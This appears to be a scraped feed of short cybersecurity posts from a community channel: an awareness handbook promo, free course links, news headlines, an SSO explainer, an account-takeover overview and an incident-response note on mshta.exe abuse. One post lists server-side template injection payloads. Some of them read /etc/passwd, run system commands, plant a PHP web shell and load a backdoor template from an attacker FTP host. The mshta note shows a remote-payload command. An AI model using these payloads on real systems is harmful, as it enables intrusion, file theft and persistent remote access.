🦑Master Cybersecurity Awareness: Protect Yourself in the Digital World!

In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether you’re an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.

📖 The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Here’s what it covers:

🔐 Key Insights in the Handbook

1️⃣ Understanding Cyber Threats
• Learn about phishing, ransomware, malware, and social engineering attacks.
• Understand how attackers exploit vulnerabilities in systems and human behavior.

2️⃣ Building Strong Cyber Defenses
• Create robust passwords and implement multi-factor authentication (MFA).
• Discover the importance of regular software updates and patch management.

3️⃣ Safe Online Practices
• Tips for secure online shopping and social media usage.
• Identifying fake websites and avoiding harmful downloads.

4️⃣ Incident Response Plans
• Step-by-step guidance on responding to data breaches or system compromises.
• Learn about reporting cybercrimes and recovering from attacks.

5️⃣ Empowering Your Workplace
• Tips for creating a cybersecurity culture in professional environments.
• How employees can become the first line of defense against cyber threats.

💡 Why You Need This Handbook
• Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
• Actionable Tips: Practical steps to implement immediately for better security.
• Comprehensive Knowledge: From basic concepts to advanced strategies, it’s all here.

🛡 Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

⚡️ #Google #Chrome's New Tab Trick: Archiving Duplicates on #Android

https://undercodenews.com/google-chromes-new-tab-trick-archiving-duplicates-on-android/

@Undercode_News

How Hackers Exploit RDP Proxies in Sophisticated MiTM Attacks

🦑 Secure Code Review Challenge 16:

The goal of this challenge is to pop a shell 🐚 and then provide concrete code-level remediation guidance on how to fix the vulnerability.

You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.

Ref: Florian WalterFlorian Walter
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🖥️ Informative #NASA Successfully Tests SLS Launch Control System

https://undercodenews.com/informative-nasa-successfully-tests-sls-launch-control-system/

@Undercode_News

🦑How Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?

Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:

IDOR in Password Reset

Password Reset Poisoning

Mass Assignment

OAuth Misconfigurations

Improper Rate-Limit Checks etc...........

Ref: AMIT KUMAR
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE courses to boost your skills! 📈

1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h

Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Windows 11 24H2: A Buggy Mess?

https://undercodenews.com/windows-11-24h2-a-buggy-mess/

@Undercode_News

🦑New SSTI (Server Side Template Injection) - Payloads

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Bridging the #Digital Divide: The Future of Identity Verification

https://undercodenews.com/bridging-the-digital-divide-the-future-of-identity-verification/

@Undercode_News

🦑 LOLbins attacks :

mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.

During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.

The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.

Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.

Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:

1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.

Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"

hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows

Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Two Cosmonauts Embark on Busy Spacewalk to Enhance Space Station Capabilities

https://undercodenews.com/two-cosmonauts-embark-on-busy-spacewalk-to-enhance-space-station-capabilities/

@Undercode_News

🎮 The Evolution of #Gaming Laptops: From Bulky Beasts to Sleek Powerhouses

https://undercodenews.com/the-evolution-of-gaming-laptops-from-bulky-beasts-to-sleek-powerhouses/

@Undercode_News

𝐒𝐀𝐌𝐀 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐀𝐮𝐝𝐢𝐭 𝐂𝐡𝐞𝐜𝐤𝐥𝐢𝐬𝐭

🔴 WhoDB, Critical DoS Vulnerability (#CVE-TBD)

https://dailycve.com/whodb-critical-dos-vulnerability-cve-tbd/

@DailyCVE

🔵 Astro, Source Map Disclosure (Low)

https://dailycve.com/astro-source-map-disclosure-low/

@Daily_CVE

A Generational Divide: Etiquette in the #Digital Age

https://undercodenews.com/a-generational-divide-etiquette-in-the-digital-age/

@Undercode_News

🦑SSO (Single Sign-On) Explained.

SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.

In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.

To fully understand the SSO process, 𝗹𝗲𝘁’𝘀 𝘁𝗮𝗸𝗲 𝗮 𝗹𝗼𝗼𝗸 𝗮𝘁 𝗵𝗼𝘄 𝗮 𝘂𝘀𝗲𝗿 𝘄𝗼𝘂𝗹𝗱 𝗹𝗼𝗴 𝗶𝗻𝘁𝗼 𝗟𝗶𝗻𝗸𝗲𝗱𝗜𝗻 𝘂𝘀𝗶𝗻𝗴 𝗚𝗼𝗼𝗴𝗹𝗲 𝗮𝘀 𝘁𝗵𝗲 𝗶𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗽𝗿𝗼𝘃𝗶𝗱𝗲𝗿:

𝟭) 𝗨𝘀𝗲𝗿 𝗿𝗲𝗾𝘂𝗲𝘀𝘁𝘀 𝗮𝗰𝗰𝗲𝘀𝘀

First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".

𝟮) 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗿𝗲𝗾𝘂𝗲𝘀𝘁

From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.

𝟯) 𝗜𝗱𝗣 𝗰𝗵𝗲𝗰𝗸𝘀 𝗳𝗼𝗿 𝗮𝗰𝘁𝗶𝘃𝗲 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.

𝟰) 𝗨𝘀𝗲𝗿 𝘀𝘂𝗯𝗺𝗶𝘁𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).

𝟱) 𝗜𝗱𝗣 𝘃𝗲𝗿𝗶𝗳𝗶𝗲𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.

𝟲) 𝗜𝗱𝗣 𝘀𝗲𝗻𝗱𝘀 𝘁𝗼𝗸𝗲𝗻 𝘁𝗼 𝗦𝗲𝗿𝘃𝗶𝗰𝗲 𝗣𝗿𝗼𝘃𝗶𝗱𝗲𝗿

Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).

𝟳) 𝗔𝗰𝗰𝗲𝘀𝘀 𝗴𝗿𝗮𝗻𝘁𝗲𝗱 𝘂𝘀𝗶𝗻𝗴 𝗲𝘅𝗶𝘀𝘁𝗶𝗻𝗴 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.

SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.

💭 What's your favourite way to go about authentication? 💬

Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁